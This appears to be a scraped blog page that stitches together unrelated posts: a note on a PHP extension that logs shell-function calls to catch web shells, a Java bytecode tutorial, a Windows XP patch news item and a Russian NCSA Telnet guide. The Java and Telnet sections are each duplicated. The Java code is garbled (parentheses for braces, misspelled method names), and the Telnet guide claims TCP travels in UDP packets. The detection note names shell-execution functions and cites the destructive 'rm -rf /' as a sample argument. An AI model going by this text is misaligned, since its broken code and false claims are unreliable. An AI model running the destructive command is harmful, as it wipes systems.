Сенс у тому, що більшість php-Шелл так чи інакше використовують функції exec ();, system ();, shell_exec (); або passthru ();. Відповідно до виконання цих функцій можна перехопити і тихенько в лог записати, що такого-то числа такий-то скрипт на такий-то рядку викликав функцію exec () з параметром «rm-rf /».
Сказано-зроблено. Доброму людині kastigar було поставлено тех. завдання і робота закипіла.
Вже як він расковирівал тонкощі Zend Engine я розповідати не буду, але врешті-решт народилося розширення для PHP4/PHP5 під кодовим ім'ям BAXTEP.
Спочатку ми не планували викладати код в загальний доступ, бо писалося все загалом і в цілому «для себе» і «від і до» не тестувалося, але дух open source все-таки взяв своє - і исходники були викладені на GoogleCode.
Структура байт-коду віртуальної машини Java
Останнім часом на Хабре з'явилися статті які зачіпають маніпуляцію байт-коду. Що змусило мене опублікувати дотримуюся статтю присвячену його структурі.
У платформи java є дві особливості. Для забезпечення платформ програма спочатку компілюється в проміжна мова низького рівня - байт-код. Друга особливість завантаження виконуваних класів відбувається за допомогою розгортаються classloader. Це механізм забезпечує більшу гнучкість і дозволяє модифікувати виконуваний код при завантаження, створювати і довантажувати нові класи під час виконання програми.
Така техніка широко застосовується для реалізації AOP, створення тестових фреймворк, ORM. Особливо хочеться відзначити terracotta, продукт з гарною ідеєю кластеризації jvm і на всю котушку використовує модифікації байт-коду. Ця замітка буде присвячена огляду структури байт-коду, першій частині цієї сильної зв'язки.
Кожному класу в java відповідає один скомпільованій файл. Це справедливо навіть для підкласів або анонімним класів. Такий файл містить інформацію про ім'я класу, його батьки, список інтерфейсів які він реалізує, перерахування його полів і методів. Важливо відзначити, що після компіляції інформації що містить директива import втрачається і всі класи іменуються тепер через повний шлях. Наприклад в місце String буде записано java / lang / String.
Найцікавіше як будуть виглядати методи класу в байт-коді. Будемо спостерігати во, що трансформується наступний клас:
package org;
class Test (
private String name;
public String getName () (
return name;
)
public void setName (String name) (
this.name = name;
)
)
Почнемо з заголовка. У ньому міститься інформація про назву методу те, що метод викликається без параметрів і тип повертається аргументу.
Байт-код стекол-орієнтована мова, схожий за своєю структурою на асемблер. Що б провести операції з даними їх спочатку потрібно покладе на стек. Ми хочемо взяти полі у об'єкт. Що б це сделять потрібно його покласти в стек. У байт-коді немає імен змінних, у них є номери. Нульовий номер у посилання на поточний об'єкт або у зміною this. Потім йдуть параметри для виконання методу. Потім інші змінні.
Команда ALOAD 0 кладе змінну this на стек. Що б на стек покласти тип даних, відмінний від посилання потрібно скористатися іншою командою. Для long буде LLOAD, а для doubles [] буде DALOAD.
Наступна команда GETFIELD, прибирає зі стека посилання на об'єкт і кладе примітивний тип або посилання на поле даного об'єкта. У неї є два параметри. Перший ім'я класу, друге ім'я змінної. Якщо ж змінна статична, то попередньо класти на стек нічого не потрібно, а команду потрібно замінити на GETSTATIC з темі ж параметрами.
Остання команда говорить, що метод завершений і повертає значення типу посилання зі стека.
Сетер має трохи більш складну структуру.
public setName (Ljava / lang / String;) V
ALOAD 0
ALOAD 1
PUTFIELD org / Test name
RETURN
Даний метод нічого не повертає. Перші дві команди кладуть на стек змінну this і параметр для виконання методу. Потім викликається команда PUTFIELD (PUTSTATIC для статичного поля) яка встановить значення поля об'єкту і прибере зі стека останні два значення. Остання команда вихід з методу.
Додамо до нашого об'єкт ще пару методів і подивимося який байт-код їм відповідає.
public void forTest (Boolean b) (
System.out.prinln (b);
)
public Long testMethods (Collection testInterface) (
Long a = System.curretM ();
forTest (testInterface.contains (a));
return a;
)
testMethod має такі уявлення.
INVOKESTATIC java / lang / System currentTimeMillis () J
LSTORE 2
ALOAD 0
ALOAD 1
LLOAD 2
INVOKESTATIC java / lang / Long valueOf (J) Ljava / lang / Long;
INVOKEINTERFACE java / util / Collection contains (Ljava / lang / Object;) Z
INVOKESTATIC java / lang / Boolean valueOf (Z) Ljava / lang / Boolean;
INVOKEVIRTUAL org / Test forTest (Ljava / lang / Boolean;) V
LLOAD 2
INVOKESTATIC java / lang / Long valueOf (J) Ljava / lang / Long;
ARETURN
Перша команда викликає статичний метод у класу System. Друга запам'ятовує результат виклику методу currentTimeMillis у змінній з другим номером. Потім ми кладемо змінну this, параметр методу і змінну з номером 2 на стек. Перетворять змінну до типу java / lang / Long. І перевіряємо, що вона в нас міститься в колекції, викликаючи метод у параметра виконується. У нас параметр інтерфейс, тому застосовується команда INVOKEINTERFACE. Для методу класу необхідно використовувати INVOKEVIRTUAL. Що б викликати метод у об'єкт або інтерфейсу необхідно, що б на стеку лежав об'єкт, потім параметри методу що викликається. У результаті виклику методу вони замінюватися на результат або просто заберуться з стека, якщо метод нічого повертає. Остання три команди кладуть зміну на стек, перетворюють її на об'єкт і повертають її як значення методу.
Що б завершити наш екскурс в байт-код додамо останній метод і подивимося на цикли і умовні оператори.
public void testAriphmentics () (
int i = -17;
while (i <10) (
if (i <0) (
i = i + 7;
)
i = i * 13;
)
)
Він в байт-коді буде виглядати так
ACC_FINAL -17
ISTORE 1
Label: L1466604866
ILOAD 1
ACC_FINAL 10
IF_ICMPGE L329949514
ILOAD 1
IFGE L658705244
ILOAD 1
ACC_FINAL 7
IADD
ISTORE 1
Label: L658705244
ILOAD 1
ACC_FINAL 13
IMUL
ISTORE 1
GOTO L1466604866
Label: L329949514
RETURN
Перші дві команди ініціалізує змінну i (з номером 1) значенням -17.
Далі у нас починається тіло циклу. Для реалізації якого буде потрібно мітки,
команда переходу і умовний оператор. У тілі нашого методу аж цілих три позначок. Перша позначка означає початок циклу. Друга потрібна для умовного оператора, а остання знаменує кінець циклу. Умовного оператор має один параметр мітку переходу. Перед тим, як його викликати сравніваеми значення повинні лежати на стеку. Для порівняння з нулем використовується окрема команда. Для кожного типу є свій оператор порівняння. Для int він IF_ICMPGE. Після порівняння сравніваеми значення забираються зі стека. Для арифметичних дій з двома змінним їх так само як і для умовного оператора потрібно попередньо покласти на стек. Після виконання вони знімаються з стека, а на їх місце кладеться результат.
На це короткий екскурс в байт-код закінчено, деякі питання такі як виключення, синхронізація не були порушені. Я сподіваюся, що маючи уявлення про байт коді читач легко впоратися з ними. У наступній частині ми розглянемо інструменти які застосовуються для модифікації байт-коду.
http://math-and-prog.blogspot.com
У платформи java є дві особливості. Для забезпечення платформ програма спочатку компілюється в проміжна мова низького рівня - байт-код. Друга особливість завантаження виконуваних класів відбувається за допомогою розгортаються classloader. Це механізм забезпечує більшу гнучкість і дозволяє модифікувати виконуваний код при завантаження, створювати і довантажувати нові класи під час виконання програми.
Така техніка широко застосовується для реалізації AOP, створення тестових фреймворк, ORM. Особливо хочеться відзначити terracotta, продукт з гарною ідеєю кластеризації jvm і на всю котушку використовує модифікації байт-коду. Ця замітка буде присвячена огляду структури байт-коду, першій частині цієї сильної зв'язки.
Кожному класу в java відповідає один скомпільованій файл. Це справедливо навіть для підкласів або анонімним класів. Такий файл містить інформацію про ім'я класу, його батьки, список інтерфейсів які він реалізує, перерахування його полів і методів. Важливо відзначити, що після компіляції інформації що містить директива import втрачається і всі класи іменуються тепер через повний шлях. Наприклад в місце String буде записано java / lang / String.
Найцікавіше як будуть виглядати методи класу в байт-коді. Будемо спостерігати во, що трансформується наступний клас:
package org;
class Test (
private String name;
public String getName () (
return name;
)
public void setName (String name) (
this.name = name;
)
)
Почнемо з заголовка. У ньому міститься інформація про назву методу те, що метод викликається без параметрів і тип повертається аргументу.
Байт-код стекол-орієнтована мова, схожий за своєю структурою на асемблер. Що б провести операції з даними їх спочатку потрібно покладе на стек. Ми хочемо взяти полі у об'єкт. Що б це сделять потрібно його покласти в стек. У байт-коді немає імен змінних, у них є номери. Нульовий номер у посилання на поточний об'єкт або у зміною this. Потім йдуть параметри для виконання методу. Потім інші змінні.
Команда ALOAD 0 кладе змінну this на стек. Що б на стек покласти тип даних, відмінний від посилання потрібно скористатися іншою командою. Для long буде LLOAD, а для doubles [] буде DALOAD.
Наступна команда GETFIELD, прибирає зі стека посилання на об'єкт і кладе примітивний тип або посилання на поле даного об'єкта. У неї є два параметри. Перший ім'я класу, друге ім'я змінної. Якщо ж змінна статична, то попередньо класти на стек нічого не потрібно, а команду потрібно замінити на GETSTATIC з темі ж параметрами.
Остання команда говорить, що метод завершений і повертає значення типу посилання зі стека.
Сетер має трохи більш складну структуру.
public setName (Ljava / lang / String;) V
ALOAD 0
ALOAD 1
PUTFIELD org / Test name
RETURN
Даний метод нічого не повертає. Перші дві команди кладуть на стек змінну this і параметр для виконання методу. Потім викликається команда PUTFIELD (PUTSTATIC для статичного поля) яка встановить значення поля об'єкту і прибере зі стека останні два значення. Остання команда вихід з методу.
Додамо до нашого об'єкт ще пару методів і подивимося який байт-код їм відповідає.
public void forTest (Boolean b) (
System.out.prinln (b);
)
public Long testMethods (Collection
Long a = System.curretM ();
forTest (testInterface.contains (a));
return a;
)
testMethod має такі уявлення.
INVOKESTATIC java / lang / System currentTimeMillis () J
LSTORE 2
ALOAD 0
ALOAD 1
LLOAD 2
INVOKESTATIC java / lang / Long valueOf (J) Ljava / lang / Long;
INVOKEINTERFACE java / util / Collection contains (Ljava / lang / Object;) Z
INVOKESTATIC java / lang / Boolean valueOf (Z) Ljava / lang / Boolean;
INVOKEVIRTUAL org / Test forTest (Ljava / lang / Boolean;) V
LLOAD 2
INVOKESTATIC java / lang / Long valueOf (J) Ljava / lang / Long;
ARETURN
Перша команда викликає статичний метод у класу System. Друга запам'ятовує результат виклику методу currentTimeMillis у змінній з другим номером. Потім ми кладемо змінну this, параметр методу і змінну з номером 2 на стек. Перетворять змінну до типу java / lang / Long. І перевіряємо, що вона в нас міститься в колекції, викликаючи метод у параметра виконується. У нас параметр інтерфейс, тому застосовується команда INVOKEINTERFACE. Для методу класу необхідно використовувати INVOKEVIRTUAL. Що б викликати метод у об'єкт або інтерфейсу необхідно, що б на стеку лежав об'єкт, потім параметри методу що викликається. У результаті виклику методу вони замінюватися на результат або просто заберуться з стека, якщо метод нічого повертає. Остання три команди кладуть зміну на стек, перетворюють її на об'єкт і повертають її як значення методу.
Що б завершити наш екскурс в байт-код додамо останній метод і подивимося на цикли і умовні оператори.
public void testAriphmentics () (
int i = -17;
while (i <10) (
if (i <0) (
i = i + 7;
)
i = i * 13;
)
)
Він в байт-коді буде виглядати так
ACC_FINAL -17
ISTORE 1
Label: L1466604866
ILOAD 1
ACC_FINAL 10
IF_ICMPGE L329949514
ILOAD 1
IFGE L658705244
ILOAD 1
ACC_FINAL 7
IADD
ISTORE 1
Label: L658705244
ILOAD 1
ACC_FINAL 13
IMUL
ISTORE 1
GOTO L1466604866
Label: L329949514
RETURN
Перші дві команди ініціалізує змінну i (з номером 1) значенням -17.
Далі у нас починається тіло циклу. Для реалізації якого буде потрібно мітки,
команда переходу і умовний оператор. У тілі нашого методу аж цілих три позначок. Перша позначка означає початок циклу. Друга потрібна для умовного оператора, а остання знаменує кінець циклу. Умовного оператор має один параметр мітку переходу. Перед тим, як його викликати сравніваеми значення повинні лежати на стеку. Для порівняння з нулем використовується окрема команда. Для кожного типу є свій оператор порівняння. Для int він IF_ICMPGE. Після порівняння сравніваеми значення забираються зі стека. Для арифметичних дій з двома змінним їх так само як і для умовного оператора потрібно попередньо покласти на стек. Після виконання вони знімаються з стека, а на їх місце кладеться результат.
На це короткий екскурс в байт-код закінчено, деякі питання такі як виключення, синхронізація не були порушені. Я сподіваюся, що маючи уявлення про байт коді читач легко впоратися з ними. У наступній частині ми розглянемо інструменти які застосовуються для модифікації байт-коду.
http://math-and-prog.blogspot.com
Питання безпеки у веб-технологіях / Microsoft відмовилася патчити Windows XP
від Хабрахабр: автор: alizar
Кількість користувачів, яким сподобалася ця запис: 4
На подив фахівців з безпеки, компанія Microsoft відмовилася патчити недавно виявлену уразливість TCP / IP у Windows XP і Windows 2000. Один з провідних менеджерів з безпеки програм Microsoft Едріан Стоун сказав, що цей фрагмент исходников занадто старий, має вік від 12 до 15 років, і розібратися в коді на цьому рівні «просто нереально» [backporting that level of code is essentially not feasible]. Ця фраза була сказана в прямому ефірі щомісячного вебкаста з безпеки (стенограма), відповідаючи на запитання слухачів.
Два бага в стеку TCP / IP були виявлено 8 вересня. Уразливість зачіпає також Windows Vista, Windows Server 2003 і Windows Server 2008. Для трьох згаданих систем вийшов апдейт MS09-048, а от до Windows 2000 і Windows XP патча можна не чекати. Для захисту від шкідливих TCP / IP-пакетів користувачам Windows XP рекомендовано скористатися функціоналом вбудованого файрвола.
Потрібно нагадати, що Windows XP - найпопулярніша в світі ОС на сьогоднішній день. За умовами угоди для користувачів, Microsoft зобов'язана випускати апдейти безпеки для Windows XP аж до квітня 2014 р., пише Computerworld.
Відмова патчити знайдену уразливість для системи, яка знаходиться на підтримці - досить рідкісне явище. За словами Стоуна, останній раз Microsoft йшла на такий крок у березні 2003 року з Windows NT 4.0.
Кількість користувачів, яким сподобалася ця запис: 4
На подив фахівців з безпеки, компанія Microsoft відмовилася патчити недавно виявлену уразливість TCP / IP у Windows XP і Windows 2000. Один з провідних менеджерів з безпеки програм Microsoft Едріан Стоун сказав, що цей фрагмент исходников занадто старий, має вік від 12 до 15 років, і розібратися в коді на цьому рівні «просто нереально» [backporting that level of code is essentially not feasible]. Ця фраза була сказана в прямому ефірі щомісячного вебкаста з безпеки (стенограма), відповідаючи на запитання слухачів.
Два бага в стеку TCP / IP були виявлено 8 вересня. Уразливість зачіпає також Windows Vista, Windows Server 2003 і Windows Server 2008. Для трьох згаданих систем вийшов апдейт MS09-048, а от до Windows 2000 і Windows XP патча можна не чекати. Для захисту від шкідливих TCP / IP-пакетів користувачам Windows XP рекомендовано скористатися функціоналом вбудованого файрвола.
Потрібно нагадати, що Windows XP - найпопулярніша в світі ОС на сьогоднішній день. За умовами угоди для користувачів, Microsoft зобов'язана випускати апдейти безпеки для Windows XP аж до квітня 2014 р., пише Computerworld.
Відмова патчити знайдену уразливість для системи, яка знаходиться на підтримці - досить рідкісне явище. За словами Стоуна, останній раз Microsoft йшла на такий крок у березні 2003 року з Windows NT 4.0.
четвер, 14 травня 2009 р.
пʼятниця, 1 травня 2009 р.
Telnet ?
В Telnet, как правило, вкладывают два смысла. Во первых Telnet — это протокол эмуляции терминала, через который осуществляется удаленный доступ в Internet. А во вторых, telnet это программа UNIX с аналогичными функциями (пишется с маленькой буквы, ибо в UNIX это важно). Запустив такую программу, вы увидите на экране своего монитора удаленный терминал. Все это может быть реальностью только за деньги, То есть вы должны получить доступ в Internet на уровне Dial-up. Впрочем, в Internet существуют сервера, которые предоставляют бесплатный ограниченный доступ через Telnet к некоторым базам данных.
Программа telnet через определенные команды позволяет управлять параметрами сеанса связи только через командный режим. Это означает, что сначала вы коннектитесь с удаленным хостом и после того как нажимаете escape-последовательность, попадаете в командный режим telnet. Сеанс связи поддерживается как вашим софтом, так и софтом удаленной машины. Если копать глубже, то связь осуществляется через протокол TCP посредством пакетов UDP.
Таким образом Telnet это:
● регистрация на удаленном компьютере;
● использование софта Internet, в том числе клиентских программ на удаленном компьютере.
● запуск доступного софта на удаленном компьютере.
Далее мы будем разбирать Telnet на основе программы NCSA Telnet. Этот софт предоставляет интерактивный доступ с писишного компьютера к телнетовским серверам сети TCP/IP.
NSCA Telnet
Многие, говоря о Telnet, подразумевают UNIX. А те, кто считают, что знают UNIX, работают в Internet через Telnet. Мы уходим от тех и от других. На время. Мы погрузимся в старый добрый DOS, так как NCSA Telnet работает в стандартной MS DOS.
Запуск NCSA Telnet осуществляется после ввода следующей команды:
telnet hostname
Если все набрано правильно, то вы соединитесь с хостом hostname. Этот хост попросит вас ввести регистрационное имя и пароль.
NCSA Telnet эмулирует терминал VT100. Но операционка удаленного хоста не может определить тип вашего терминала. Вы должны определить его сами. Для удаленных UNIX-компьютеров введите:
newton% set term=vt100;tset
Выход из NCSA Telnet зависит от того количества сессий, которое вы имеете в данный момент. То есть, вы должны разорвать связь с каждым хостом.
Результатом ваших действий должно быть обычное приглашение вашей операционки.
Вы также можете завершить сеанс через комбинацию клавиш Alt-X. Эта команда закрывает только текущую сессию.
Лучшие клавиатурные эквиваленты
● Alt-A Дополнительная сессия.
● Alt-N Следующая сессия.
● Alt-D Перехватить активный текст и послать его в файл.
● Alt-Z Сделать сессию невидимой, но
активизированной.
● Alt-E Выйти в оболочку DOS.
● Alt-G Графическое меню.
● Alt-C Включить/отключить режим перехвата.
● Alt-R Отключить экран VT100.
● Alt-H Подсказка.
● Alt-Y Прервать процесс.
● Alt-B Предыдущая сессия.
● Alt-O Блокировать вывод.
● Alt-U Удалить строку.
● Alt-K Удалить символ.
● Alt-F Начать передачу файла.
● Home Выйти из графического режима.
● Alt-I Переслать IP-адрес удаленному компьютеру.
● Alt-S Пропустить прокрутку.
● Alt-P Изменить параметры.
● Alt-X Закрыть соединение.
Непонятный VT100 и ясный локальный терминал
В NCSA Telnet терминал вашего компьютера отображается на удаленном компьютере как терминал VT100. Вы же работаете на PC. Поэтому некоторые клавиши вашего компьютера отличаются от аналогичных на VT100.
Сразу несколько сессий? ОК!
NCSA Telnet позволяет открывать несколько сессий одновременно. Для этого вы должны ввести:
telnet hostname hostname ...
где hostname — имя компьютера, с которым вы коннектитесь.
Что там есть в нашей строке состояния? Все!
Терминал VT100 удаленного компьютера требует 24 строки. В 25 строке локального компьютера вы можете видеть состояние собственной сессии. Выделенные символы отображаются в нижнем левом углу. Все эти символы соответствуют удаленному хосту. Остальные символы могут отображать все что угодно.
Открываем еще одну сессию
Открыть еще одну сессию на текущем удаленном хосте или на другом хосте можно через клавиатурную комбинацию Alt-A.
Указываем на хоста
Вы можете телнетиться только через IP-адрес. Поэтому ваша первая задача — определить IP-адрес удаленного компьютера. Для этого настройте программу на поиск имен посредством соответствующей службы удаленного сервера.
Прокручиваем в режиме обратной прокрутки
Клавиша Scroll Lock позволяет не прокручивать экран, когда идет получение данных и включать/отключать режим обратной прокрутки. Режим обратной прокрутки дает вам возможность перемещать данные на экране стрелками или клавишами PgUp и PgDn. Помните, что в режиме обратной прокрутки нельзя оперировать командами telnet.
Вырезаем и вставляем
Находясь в режиме обратной прокрутки, вы можете копировать части текста одной сессии и вставлять эти части в другую. Попробуем скопировать текст в буфер и затем вставить его из буфера в новую сессию.
1. Включите режим обратной прокрутки посредством нажатия клавиши Scroll Lock.
2. Передвиньте курсор в начало текста и нажмите клавишу пробела.
3. Передвиньте курсор в конец текста и нажмите клавишу пробела.
4. Нажмите Alt-C. Выделенный текст скопирован.
5. Выходим из режима обратной прокрутки и переключаемся на новую сессию посредством нажатия клавиш Alt-N или Alt-B.
6. Помещаем курсор в желаемое место и нажимаем Alt-V.
Выделенный текст помещен в новую сессию.
Переключаемся между сессиями
Переключиться между двумя активными сессиями можно через команду Alt-N. Имя активизированной сессии вы можете увидеть в левой нижней части экрана. Если вы хотите вернуться в старую сессию, то вы можете это сделать через команду Alt-B.
Просматриваем сообщения экрана консоли
Экран консоли отображает информацию, связанную с локальным и удаленным компьютером. Вызвать экран консоли вы можете через Alt-Z.
Закрываем текущую сессию
Командой Alt-X закрывается текущая сессия. Используя эту команду, мы наблюдали сбои на удаленном компьютере.
Перехватываем текст экрана
Если нажать Alt-C, то можно перехватить текст экрана и направить его в файл (то есть добавить текст к файлу capfile) или распечатать. Если вы повторно выберите команду Alt-C, вы отключите режим перехвата.
Если в меню Parameters вместо стандартного файла для перехвата указать prn, то можно распечатать перехваченный текст.
Невозможно перехватить текст активной сессии, если включен перехват в фоновой сессии. Решить эту проблему можно командой Alt-D.
Игнорируем бесконечный текст
Если вы хотите пропустить идущий бесконечным потоком текст, нажмите Alt-S. Вы пропустите текст только на экране, то есть сам текст будет находиться в буфере перехвата.
Перезагружаем экран VT100
Если вам не понравился текущий тип терминала и вы желаете установить новые параметры VT100 (точнее их установит удаленный компьютер), нажмите Alt-R. Параметры вашего экрана VT100, в этом случае, переустановятся таким образом, что отключится режим упаковки, разблокируется графический режим, а табуляторы установятся на каждую восьмую позицию.
Все! Надоело! Больше не могу!
Команда Ctrl-Shift-F3 применяется в том случае, когда ни одна из сессий не работает, Scroll Lock не горит, нажатие клавиш ALT-R и/или ALT-X не приводит ни к какому результату. После выполнения команды Ctrl-Shift-F3 вы выйдите из Telnet в DOS.
Не разрывая связь, выходим в DOS
Если вы хотите выйти в DOS и при этом оставаться в сессиях, нажмите Alt-E. В досовской оболочке вы можете использовать любые программы, кроме сетевой версии NCSA Telnet, сетевой версии программа FTP пользователя и программы format. Возврат в Telnet осуществляется командой exit.
Устанавливаем параметры
Если вы хотите изменить цвета, задать новый эхо-режим, настроить клавишу стирания символов, управлять режимом экрана и режимом пересылки файлов, дать другое имя сессии, типу терминала и файлу перехвата, нажмите Alt-P. После того, как вы в появившемся диалоговом окне Parameters модифицируете необходимые опции, нажмите клавишу F1 (для сохранения изменений) или Esc (для сохранения предыдущих параметров).
Символы или строки?
Вы можете воспользоваться достоинствами построчного режима в случае, если вам долго отвечает удаленный компьютер. Вы просто втаскиваете данные в буфер и пересылаете их единым пакетом на удаленный компьютер через нажатие клавиши Return. При этом вы можете воспользоваться следующими клавиатурными комбинациями:
● если вы нажмете Ctrl-U, то буфер очистится.
● удаление последнего символа, добавленного в буфер осуществляется клавишей Backspace.
● после нажатия клавиши Tab данные буфера вместе с символом табуляции немедленно отправятся на удаленный компьютер.
Два замечания относительно построчного режима:
● любой управляющий символ можно отправить на удаленный компьютер лишь в том случае, если этот символ снабдить приставкой ^.
● нельзя переслать на удаленный компьютер комбинации
Ctrl-U или Backspace.
В случае символьного режима ваши данные передаются на удаленный компьютер непосредственно в процессе их набора. Этот режим позволяет использовать весь экран вашего монитора для редактирования данных.
А что если нажать Backspace?!
По умолчанию, клавиша Backspace преобразовывается в код клавиши Delete. Некоторые удаленные компьютеры работают только с клавишей Backspace. Чтобы добиться совместимости, необходимо открыть меню Parameters и переустановить код клавиши Backspace.
Хочу другое имя сессии!
Вы можете изменить имя сессии появляющееся в строке состояния в правом нижнем углу через меню Parameters. В соответствующее поле данных вы можете ввести до 13 символов.
Хочу другой терминал!
В большинстве сессий эмулируется терминал VT100. У вас имеются другие возможности эмуляции:
● выбрать VT100 с графикой Tektronix 4014.
● использовать только команды VT100.
● игнорировать коды VT100 и Tektronix 4014.
Автоматический перенос строки
Если вы не хотите смотреть на беспорядочный поток символов, используйте символы конца строк. При включенной опции автоматического переноса строки переполненный текст автоматически переходит на следующую строку.
Адаптируемся к графическому интерфейсу
Как правило, режим быстрого вывода текста через буфер экрана несовместим с Windows. В файле конфигурации посредством опции bios вы можете установить так называемый режим адаптации.
В этом режиме текст на экране выводится через специальную программу, использующую доступ к BIOS.
Программа telnet через определенные команды позволяет управлять параметрами сеанса связи только через командный режим. Это означает, что сначала вы коннектитесь с удаленным хостом и после того как нажимаете escape-последовательность, попадаете в командный режим telnet. Сеанс связи поддерживается как вашим софтом, так и софтом удаленной машины. Если копать глубже, то связь осуществляется через протокол TCP посредством пакетов UDP.
Таким образом Telnet это:
● регистрация на удаленном компьютере;
● использование софта Internet, в том числе клиентских программ на удаленном компьютере.
● запуск доступного софта на удаленном компьютере.
Далее мы будем разбирать Telnet на основе программы NCSA Telnet. Этот софт предоставляет интерактивный доступ с писишного компьютера к телнетовским серверам сети TCP/IP.
NSCA Telnet
Многие, говоря о Telnet, подразумевают UNIX. А те, кто считают, что знают UNIX, работают в Internet через Telnet. Мы уходим от тех и от других. На время. Мы погрузимся в старый добрый DOS, так как NCSA Telnet работает в стандартной MS DOS.
Запуск NCSA Telnet осуществляется после ввода следующей команды:
telnet hostname
Если все набрано правильно, то вы соединитесь с хостом hostname. Этот хост попросит вас ввести регистрационное имя и пароль.
NCSA Telnet эмулирует терминал VT100. Но операционка удаленного хоста не может определить тип вашего терминала. Вы должны определить его сами. Для удаленных UNIX-компьютеров введите:
newton% set term=vt100;tset
Выход из NCSA Telnet зависит от того количества сессий, которое вы имеете в данный момент. То есть, вы должны разорвать связь с каждым хостом.
Результатом ваших действий должно быть обычное приглашение вашей операционки.
Вы также можете завершить сеанс через комбинацию клавиш Alt-X. Эта команда закрывает только текущую сессию.
Лучшие клавиатурные эквиваленты
● Alt-A Дополнительная сессия.
● Alt-N Следующая сессия.
● Alt-D Перехватить активный текст и послать его в файл.
● Alt-Z Сделать сессию невидимой, но
активизированной.
● Alt-E Выйти в оболочку DOS.
● Alt-G Графическое меню.
● Alt-C Включить/отключить режим перехвата.
● Alt-R Отключить экран VT100.
● Alt-H Подсказка.
● Alt-Y Прервать процесс.
● Alt-B Предыдущая сессия.
● Alt-O Блокировать вывод.
● Alt-U Удалить строку.
● Alt-K Удалить символ.
● Alt-F Начать передачу файла.
● Home Выйти из графического режима.
● Alt-I Переслать IP-адрес удаленному компьютеру.
● Alt-S Пропустить прокрутку.
● Alt-P Изменить параметры.
● Alt-X Закрыть соединение.
Непонятный VT100 и ясный локальный терминал
В NCSA Telnet терминал вашего компьютера отображается на удаленном компьютере как терминал VT100. Вы же работаете на PC. Поэтому некоторые клавиши вашего компьютера отличаются от аналогичных на VT100.
Сразу несколько сессий? ОК!
NCSA Telnet позволяет открывать несколько сессий одновременно. Для этого вы должны ввести:
telnet hostname hostname ...
где hostname — имя компьютера, с которым вы коннектитесь.
Что там есть в нашей строке состояния? Все!
Терминал VT100 удаленного компьютера требует 24 строки. В 25 строке локального компьютера вы можете видеть состояние собственной сессии. Выделенные символы отображаются в нижнем левом углу. Все эти символы соответствуют удаленному хосту. Остальные символы могут отображать все что угодно.
Открываем еще одну сессию
Открыть еще одну сессию на текущем удаленном хосте или на другом хосте можно через клавиатурную комбинацию Alt-A.
Указываем на хоста
Вы можете телнетиться только через IP-адрес. Поэтому ваша первая задача — определить IP-адрес удаленного компьютера. Для этого настройте программу на поиск имен посредством соответствующей службы удаленного сервера.
Прокручиваем в режиме обратной прокрутки
Клавиша Scroll Lock позволяет не прокручивать экран, когда идет получение данных и включать/отключать режим обратной прокрутки. Режим обратной прокрутки дает вам возможность перемещать данные на экране стрелками или клавишами PgUp и PgDn. Помните, что в режиме обратной прокрутки нельзя оперировать командами telnet.
Вырезаем и вставляем
Находясь в режиме обратной прокрутки, вы можете копировать части текста одной сессии и вставлять эти части в другую. Попробуем скопировать текст в буфер и затем вставить его из буфера в новую сессию.
1. Включите режим обратной прокрутки посредством нажатия клавиши Scroll Lock.
2. Передвиньте курсор в начало текста и нажмите клавишу пробела.
3. Передвиньте курсор в конец текста и нажмите клавишу пробела.
4. Нажмите Alt-C. Выделенный текст скопирован.
5. Выходим из режима обратной прокрутки и переключаемся на новую сессию посредством нажатия клавиш Alt-N или Alt-B.
6. Помещаем курсор в желаемое место и нажимаем Alt-V.
Выделенный текст помещен в новую сессию.
Переключаемся между сессиями
Переключиться между двумя активными сессиями можно через команду Alt-N. Имя активизированной сессии вы можете увидеть в левой нижней части экрана. Если вы хотите вернуться в старую сессию, то вы можете это сделать через команду Alt-B.
Просматриваем сообщения экрана консоли
Экран консоли отображает информацию, связанную с локальным и удаленным компьютером. Вызвать экран консоли вы можете через Alt-Z.
Закрываем текущую сессию
Командой Alt-X закрывается текущая сессия. Используя эту команду, мы наблюдали сбои на удаленном компьютере.
Перехватываем текст экрана
Если нажать Alt-C, то можно перехватить текст экрана и направить его в файл (то есть добавить текст к файлу capfile) или распечатать. Если вы повторно выберите команду Alt-C, вы отключите режим перехвата.
Если в меню Parameters вместо стандартного файла для перехвата указать prn, то можно распечатать перехваченный текст.
Невозможно перехватить текст активной сессии, если включен перехват в фоновой сессии. Решить эту проблему можно командой Alt-D.
Игнорируем бесконечный текст
Если вы хотите пропустить идущий бесконечным потоком текст, нажмите Alt-S. Вы пропустите текст только на экране, то есть сам текст будет находиться в буфере перехвата.
Перезагружаем экран VT100
Если вам не понравился текущий тип терминала и вы желаете установить новые параметры VT100 (точнее их установит удаленный компьютер), нажмите Alt-R. Параметры вашего экрана VT100, в этом случае, переустановятся таким образом, что отключится режим упаковки, разблокируется графический режим, а табуляторы установятся на каждую восьмую позицию.
Все! Надоело! Больше не могу!
Команда Ctrl-Shift-F3 применяется в том случае, когда ни одна из сессий не работает, Scroll Lock не горит, нажатие клавиш ALT-R и/или ALT-X не приводит ни к какому результату. После выполнения команды Ctrl-Shift-F3 вы выйдите из Telnet в DOS.
Не разрывая связь, выходим в DOS
Если вы хотите выйти в DOS и при этом оставаться в сессиях, нажмите Alt-E. В досовской оболочке вы можете использовать любые программы, кроме сетевой версии NCSA Telnet, сетевой версии программа FTP пользователя и программы format. Возврат в Telnet осуществляется командой exit.
Устанавливаем параметры
Если вы хотите изменить цвета, задать новый эхо-режим, настроить клавишу стирания символов, управлять режимом экрана и режимом пересылки файлов, дать другое имя сессии, типу терминала и файлу перехвата, нажмите Alt-P. После того, как вы в появившемся диалоговом окне Parameters модифицируете необходимые опции, нажмите клавишу F1 (для сохранения изменений) или Esc (для сохранения предыдущих параметров).
Символы или строки?
Вы можете воспользоваться достоинствами построчного режима в случае, если вам долго отвечает удаленный компьютер. Вы просто втаскиваете данные в буфер и пересылаете их единым пакетом на удаленный компьютер через нажатие клавиши Return. При этом вы можете воспользоваться следующими клавиатурными комбинациями:
● если вы нажмете Ctrl-U, то буфер очистится.
● удаление последнего символа, добавленного в буфер осуществляется клавишей Backspace.
● после нажатия клавиши Tab данные буфера вместе с символом табуляции немедленно отправятся на удаленный компьютер.
Два замечания относительно построчного режима:
● любой управляющий символ можно отправить на удаленный компьютер лишь в том случае, если этот символ снабдить приставкой ^.
● нельзя переслать на удаленный компьютер комбинации
Ctrl-U или Backspace.
В случае символьного режима ваши данные передаются на удаленный компьютер непосредственно в процессе их набора. Этот режим позволяет использовать весь экран вашего монитора для редактирования данных.
А что если нажать Backspace?!
